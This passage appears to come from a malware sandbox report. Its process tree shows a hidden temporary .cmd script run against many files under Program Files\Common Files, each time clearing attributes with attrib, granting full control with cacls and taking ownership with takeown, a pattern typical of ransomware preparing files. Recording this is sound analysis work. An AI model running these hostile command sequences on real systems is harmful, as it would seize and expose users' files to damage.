    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\tipresx.dll.mui"
    3⤵
    PID:1900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\tipresx.dll.mui""
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\tipresx.dll.mui"
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\tipresx.dll.mui"
    3⤵
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\tipresx.dll.mui""
  2⤵
  PID:556
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\tipresx.dll.mui"
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\tipresx.dll.mui"
    3⤵
    - Modifies file permissions
    PID:836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\tipresx.dll.mui""
  2⤵
  PID:1196
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\tipresx.dll.mui"
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\tipresx.dll.mui"
    3⤵
    PID:240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\msinfo32.exe.mui""
  2⤵
  PID:816
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\msinfo32.exe.mui"
    3⤵
    - Views/modifies file attributes
    PID:1848
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\msinfo32.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\msinfo32.exe.mui"
    3⤵
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF""
  2⤵
  PID:108
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF"
    3⤵
    PID:844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF" /E /G Admin:F /C
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF"
    3⤵
    - Modifies file permissions
    PID:1220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.htm""
  2⤵
  PID:1504
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.htm"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.htm" /E /G Admin:F /C
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.htm"
    3⤵
    PID:1108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Cave_Drawings.gif""
  2⤵
  PID:1652
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Cave_Drawings.gif"
    3⤵
    PID:752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Cave_Drawings.gif" /E /G Admin:F /C
    3⤵
    PID:1360
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Cave_Drawings.gif"
    3⤵
    PID:1100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Connectivity.gif""
  2⤵
  PID:1444
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Connectivity.gif"
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Connectivity.gif" /E /G Admin:F /C
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Connectivity.gif"
    3⤵
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Dotted_Lines.emf""
  2⤵
  PID:1612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Dotted_Lines.emf"
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Dotted_Lines.emf" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Dotted_Lines.emf"
    3⤵
    - Modifies file permissions
    PID:836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.htm""
  2⤵
  PID:748
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.htm"
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.htm" /E /G Admin:F /C
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.htm"
    3⤵
    - Modifies file permissions
    PID:240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_1.emf""
  2⤵
  PID:1496
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_1.emf"
    3⤵
    - Views/modifies file attributes
    PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_1.emf" /E /G Admin:F /C
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_1.emf"
    3⤵
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_2.emf""
  2⤵
  PID:1632
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_2.emf"
    3⤵
    - Views/modifies file attributes
    PID:912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_2.emf" /E /G Admin:F /C
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_2.emf"
    3⤵
    PID:112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Graph.emf""
  2⤵
  PID:368
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Graph.emf"
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Graph.emf" /E /G Admin:F /C
    3⤵
    PID:888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Graph.emf"
    3⤵
    PID:1620
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Green Bubbles.htm""
  2⤵
  PID:1544
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Green Bubbles.htm"
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Green Bubbles.htm" /E /G Admin:F /C
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Green Bubbles.htm"
    3⤵
    PID:1336
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf""
  2⤵
  PID:2028
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf"
    3⤵
    PID:1360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf" /E /G Admin:F /C
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf"
    3⤵
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(inch).wmf""
  2⤵
  PID:1412
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(inch).wmf"
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(inch).wmf" /E /G Admin:F /C
    3⤵
    PID:1320
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(inch).wmf"
    3⤵
    PID:1444
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm""
  2⤵
  PID:1808
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm"
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm" /E /G Admin:F /C
    3⤵
    PID:556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm"
    3⤵
    PID:1612
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Memo.emf""
  2⤵
  PID:1776
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Memo.emf"
    3⤵
    - Views/modifies file attributes
    PID:1464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Memo.emf" /E /G Admin:F /C
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Memo.emf"
    3⤵
    PID:748
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Month_Calendar.emf""
  2⤵
  PID:568
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Month_Calendar.emf"
    3⤵
    PID:816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Month_Calendar.emf" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Month_Calendar.emf"
    3⤵
    PID:1660
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Music.emf""
  2⤵
  PID:912
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Music.emf"
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Music.emf" /E /G Admin:F /C
    3⤵
    PID:844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Music.emf"
    3⤵
    PID:1636
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Orange Circles.htm""
  2⤵
  PID:1512
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Orange Circles.htm"
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Orange Circles.htm" /E /G Admin:F /C
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Orange Circles.htm"
    3⤵
    PID:1884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm""
  2⤵
  PID:300
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm"
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm" /E /G Admin:F /C
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm"
    3⤵
    - Modifies file permissions
    PID:668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.htm""
  2⤵
  PID:1964
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.htm"
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.htm" /E /G Admin:F /C
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.htm"
    3⤵
    PID:752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Seyes.emf""
  2⤵
  PID:1232
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Seyes.emf"
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Seyes.emf" /E /G Admin:F /C
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Seyes.emf"
    3⤵
    PID:1112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Shades of Blue.htm""
  2⤵
  PID:1948
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Shades of Blue.htm"
    3⤵
    PID:1960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Shades of Blue.htm" /E /G Admin:F /C
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Shades of Blue.htm"
    3⤵
    PID:1584
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Shorthand.emf""
  2⤵
  PID:1488
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Shorthand.emf"
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Shorthand.emf" /E /G Admin:F /C
    3⤵
    PID:524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Shorthand.emf"
    3⤵
    PID:1816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Soft Blue.htm""
  2⤵
  PID:1920
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Soft Blue.htm"
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Soft Blue.htm" /E /G Admin:F /C
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Soft Blue.htm"
    3⤵
    PID:1904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.htm""
  2⤵
  PID:1216
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.htm"
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.htm" /E /G Admin:F /C
    3⤵
    PID:108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.htm"
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stucco.gif""
  2⤵
  PID:1852
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stucco.gif"
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stucco.gif" /E /G Admin:F /C
    3⤵
    PID:888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Stucco.gif"
    3⤵
    PID:1448
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Tiki.gif""
  2⤵
  PID:1916
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Tiki.gif"
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Tiki.gif" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Tiki.gif"
    3⤵
    PID:1372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\To_Do_List.emf""
  2⤵
  PID:1124
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\To_Do_List.emf"
    3⤵
    PID:1684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\To_Do_List.emf" /E /G Admin:F /C
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\To_Do_List.emf"
    3⤵
    PID:2016
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Wrinkled_Paper.gif""
  2⤵
  PID:1924
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Wrinkled_Paper.gif"
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Wrinkled_Paper.gif" /E /G Admin:F /C
    3⤵
    PID:432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Wrinkled_Paper.gif"
    3⤵
    PID:1104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Services\verisign.bmp""
  2⤵
  PID:1960
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Services\verisign.bmp"
    3⤵
    PID:1196
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Services\verisign.bmp" /E /G Admin:F /C
    3⤵
    PID:556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Services\verisign.bmp"
    3⤵
    PID:2008
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\MSTTSLoc.dll.mui""
  2⤵
  PID:1628
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\MSTTSLoc.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:1848
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\MSTTSLoc.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\MSTTSLoc.dll.mui"
    3⤵
    PID:2040
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\adojavas.inc""
  2⤵
  PID:1896
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\adojavas.inc"
    3⤵
    - Views/modifies file attributes
    PID:112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\adojavas.inc" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\adojavas.inc"
    3⤵
    PID:1892
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\adovbs.inc""
  2⤵
  PID:1888
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\adovbs.inc"
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\adovbs.inc" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\adovbs.inc"
    3⤵
    PID:676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui""
  2⤵
  PID:1504
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:1336
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui" /E /G Admin:F /C
    3⤵
    PID:332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui"
    3⤵
    PID:1468
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\msado20.tlb""
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\msado20.tlb"
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\msado20.tlb" /E /G Admin:F /C
    3⤵
    PID:904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\msado20.tlb"
    3⤵
    PID:1968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\msado21.tlb""
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\msado21.tlb"
    3⤵
    PID:1444
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\msado21.tlb" /E /G Admin:F /C
    3⤵
    PID:1552
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\msado21.tlb"
    3⤵
    PID:760
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\System\ado\msado25.tlb""
  2⤵
  PID:884
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\System\ado\msado25.tlb"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\System\ado\msado25.tlb" /E /G Admin:F /C
    3⤵
    PID:1068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\System\ado\msado25.tlb"
    3⤵
